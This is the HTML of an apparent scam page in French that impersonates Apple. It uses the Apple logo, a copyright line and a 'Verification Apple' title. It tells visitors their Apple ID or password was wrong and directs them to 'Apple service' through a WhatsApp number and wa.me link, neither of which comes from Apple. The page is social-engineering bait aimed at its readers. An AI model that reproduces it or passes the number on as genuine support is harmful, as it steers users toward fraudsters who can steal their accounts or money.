
<!DOCTYPE html>
<html lang="fr">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>Verification Apple</title>
<link rel="stylesheet" href="style.css" />
</head>
<body>
  <header>
    <img src="apple-logo.svg" alt="Apple Logo" />
  </header>
  <main>
    <div class="login-container" role="main" aria-label="Page de connexion Apple ID">
      <h1>Verification Apple</h1>
      <p class="subtitle">L'identifiant Apple ou le mot de passe que vous avez saisi est incorrect.</p>
      <p class="subtitle">Veuillez conctacter le service Apple de votre pays via WHATSAPP : 237650687179.
       <p>  <a href="https://wa.me/650687179">WhatsApp</a> </p>
      </p>
    </div>
  </main>
  <footer>
    &copy; 2025 Apple Inc. Tous droits réservés.
  </footer>
<script src="script.js"></script>
</body>
</html>
